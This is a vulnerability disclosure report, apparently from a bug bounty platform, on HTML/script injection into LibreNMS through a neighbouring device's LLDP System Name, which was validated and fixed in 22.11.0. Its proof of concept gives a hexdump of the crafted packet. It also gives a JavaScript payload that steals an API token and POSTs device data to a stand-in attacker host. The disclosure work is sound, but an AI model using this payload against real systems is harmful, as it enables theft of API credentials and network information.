HTML injection possible via LLDP in librenms/librenms

Valid

Reported on

Nov 10th 2022


Description

An unmanaged/foreign neighbouring device that is advertising its presence with LLDP can inject malicious HTML code into LibreNMS by setting its System Name TLV to whatever snippet is to be injected. This is assuming that a device that is managed by LibreNMS has LLDP and the corresponding MIBS enabled on externally facing ports (ports that connect to someone else's equipment).

Proof of Concept

The following is a hexdump of the evil LLDP packet I used. I changed the evil domain name to something generic, otherwise it should be the same. I suggest importing and viewing it in Wireshark.

0000   01 80 c2 00 00 0e 08 00 27 7c 02 72 88 cc 02 07
0010   04 08 00 27 df b0 7f 04 07 03 08 00 27 df b0 7f
0020   06 02 f0 78 0a 47 3c 73 63 72 69 70 74 20 73 72
0030   63 3d 22 68 74 74 70 3a 2f 2f 65 76 69 6c 2e 77
0040   65 62 2E 73 65 72 76 65 72 3a 33 30 30 30 2f 65
0050   76 69 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74
0060   3e 75 6e 73 75 73 70 69 63 69 6f 75 73 0c 77 50
0070   61 72 72 6f 74 20 4f 53 20 35 2e 31 20 28 45 6c
0080   65 63 74 72 6f 20 41 72 61 29 20 4c 69 6e 75 78
0090   20 36 2e 30 2e 30 2d 32 70 61 72 72 6f 74 31 2d
00a0   61 6d 64 36 34 20 23 31 20 53 4d 50 20 50 52 45
00b0   45 4d 50 54 5f 44 59 4e 41 4d 49 43 20 44 65 62
00c0   69 61 6e 20 36 2e 30 2e 32 2d 31 70 61 72 72 6f
00d0   74 31 20 28 32 30 32 32 2d 31 30 2d 31 38 29 20
00e0   78 38 36 5f 36 34 0e 04 00 9c 00 80 10 0c 05 01
00f0   0a 00 02 0f 02 00 00 00 02 00 10 18 11 02 fe 80
0100   00 00 00 00 00 00 9a a9 04 cb b4 21 9f 15 02 00
0110   00 00 02 00 08 06 65 6e 70 30 73 33 00 00

If this packet is received by an LLDP-enabled device that LibreNMS manages, anyone who views that device's "Neighbours" tab will be the victim of a XSS attack.

For instance, a script like the following script could get executed in the victim's browser. It looks for API tokens and then uses those to interact with the LibreNMS API. This particular example fetches some information about the network, which it then sends to the attacker's server in a POST request body.

async function evil() {
    let response = await fetch("/api-access");
    let result = await response.text();
    matches = result.match(/data-token_hash="[a-z0-9]{32}"/)
    hash = matches[0].match(/[a-z0-9]{32}/)
    hash = hash[0]

    let apiresponse = await fetch("/api/v0/devices", {
        headers: {
            "X-Auth-Token": hash
        }
    });
    let apiresult = await apiresponse.text();
    console.log(apiresult)
    let evil_send = await fetch("http://evil.web.server:3000", {
        method: "POST",
        body: apiresult
    });
}
evil()

Impact

Depending on the authority of the victim who visits the "Neighbours" tab, the impact could differ. But if, for instance, the victim has full rights and has created API-tokens, a malicious script could use those to bring up or down services, view billing information or gain knowledge about the network topology and architecture.

We are processing your report and will contact the librenms team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the librenms team and are waiting to hear back a year ago
Zluudg
a year ago

Researcher


Feel free to ping me on Discord (nickname "zluudg") if you want to have a more in-depth chat about this issue. I joined the official LibreNMS server, so you should be able to find me there. I'm curious to hear what you think!

Tony Murray validated this vulnerability a year ago
zluudg has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.11.0 with commit 419677 a year ago
The fix bounty has been dropped
neighbours.inc.php#L22 has been validated
This vulnerability has now been published 5 months ago
to join this conversation